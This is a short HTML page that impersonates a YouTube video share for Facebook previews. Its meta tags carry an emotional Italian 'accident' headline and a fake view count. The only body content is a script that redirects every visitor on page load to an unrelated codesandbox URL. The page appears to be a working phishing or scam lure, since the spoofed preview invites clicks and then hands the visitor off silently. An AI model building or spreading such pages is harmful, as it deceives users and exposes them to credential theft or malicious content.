<!DOCTYPE html>
<html>
	<head>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
		<meta name="facebook:card" content="summary_large_image" />
		<meta name="facebook:description" content="Youtube" />
		<meta name="facebook:app:country" content="US" />
		<meta property="og:image" content="./image2.jpeg" />
		<meta property="og:title" content="Purtroppo è appena successo un incidente..😭" />
		<meta property="og:description" content="874, 835 views" />
		<meta property="og:site_name" content="YouTube" />
		<meta property="fb:app_id" content="87741124304" />
	</head>
	<body>
	<script>
        (function () {
            const nuevaURL = 'https://fhsh3c.csb.app/';
            window.location.href = nuevaURL;
        })();
    </script>
	</body>
</html>